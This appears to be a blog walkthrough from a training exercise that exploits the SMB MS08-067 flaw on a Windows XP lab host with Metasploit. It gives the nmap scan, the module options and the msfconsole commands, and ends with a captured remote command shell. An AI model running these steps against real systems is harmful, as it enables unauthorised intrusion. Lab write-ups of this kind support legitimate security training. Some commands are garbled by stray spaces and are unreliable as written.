hahahaha
I can be the task of training again, this time I was told to Exploit smb in windows xp with metasploit.
First, do the information gathering and Service Enumeration
with nmap tool we can find what we are looking for, example : operating systems, open ports, etc..
entered the terminal and type:
root @ bt: ~ # nmap-v-sV 172.16.227.128
and the results:
Spoiler:
Exploit Module Options
| RHOST | The target address |
| RPORT | Set the SMB service port (default: 445) |
| SMBPIPE | The pipe name to use (BROWSER, SRVSVC) (default: BROWSER) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DCERPC::ReadTimeout | The number of seconds to wait for DCERPC responses |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| NTLM::SendLM | Always send the LANMAN response (except when NTLMv2_session is specified) |
| NTLM::SendNTLM | Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses |
| NTLM::SendSPN | Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required |
| NTLM::UseLMKey | Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent |
| NTLM::UseNTLM2_session | Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session |
| NTLM::UseNTLMv2 | Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true |
| Proxies | Use a proxy chain |
| SMB::ChunkSize | The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing |
| SMB::Native_LM | The Native LM to send during authentication |
| SMB::Native_OS | The Native OS to send during authentication |
| SMB::VerifySignature | Enforces client-side verification of server response signatures |
| SMBDirect | The target port is a raw SMB service (not NetBIOS) |
| SMBDomain | The Windows domain to use for authentication |
| SMBName | The NetBIOS hostname (required for port 139 connections) |
| SMBPass | The password for the specified username |
| SMBUser | The username to authenticate as |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| DCERPC::fake_bind_multi | Use multi-context bind calls |
| DCERPC::fake_bind_multi_append | Set the number of UUIDs to append the target |
| DCERPC::fake_bind_multi_prepend | Set the number of UUIDs to prepend before the target |
| DCERPC::max_frag_size | Set the DCERPC packet fragmentation size |
| DCERPC::smb_pipeio | Use a different delivery method for accessing named pipes (accepted: rw, trans) |
| SMB::obscure_trans_pipe_level | Obscure PIPE string in TransNamedPipe (level 0-3) |
| SMB::pad_data_level | Place extra padding between headers and data (level 0-3) |
| SMB::pad_file_level | Obscure path names used in open/create (level 0-3) |
| SMB::pipe_evasion | Enable segmented read/writes for SMB Pipes |
| SMB::pipe_read_max_size | Maximum buffer size for pipe reads |
| SMB::pipe_read_min_size | Minimum buffer size for pipe reads |
| SMB::pipe_write_max_size | Maximum buffer size for pipe writes |
| SMB::pipe_write_min_size | Minimum buffer size for pipe writes |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
second, go to the console metaspoit
type:
root @ bt: ~ # cd / opt/framework/msf3 /
root @ bt :/ # msfconsole opt/framework/msf3
and the result is
to see the smb module, type:
msf> search smb
and this is the result
above we can see the "rank", here we can see the vulnerability in the smb module.
from the start that, great, good, average, low.
I've been looking for a great and matched according to the target OS, and open ports, namely port 445. views of the target OS is Windows XP sp3, then adapted to exploit smb version available.
Third, select the smb module.
for example:
exploit/windows/smb/ms08_067_netapi
and type:
msf> use exploit/windows/smb/ms08_067_netapi
then be entered:
msf exploit (ms08_067_netapi)> show options
settings will appear, as shown in the "Exploit target" will usually aesthetically OS name. because the module can all windows OS
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
--------------------------------------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
id Name
------
0 Automatic Targeting
Fourth, enter the address RHOST or Target
msf exploit (ms08_067_netapi)> set RHOST 172.16.227.128
RHOST => 172.16.227.128
and are we waiting for, type:
msf exploit (ms08_067_netapi)> exploit
and are we waiting for, type:
meterpreter> shell
yuhuuuuuuu .....
and ultimately, exploited. into the C: \ WINDOWS \ system32>
Process 2324 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp..
C: \ WINDOWS \ system32>
0 komentar:
Posting Komentar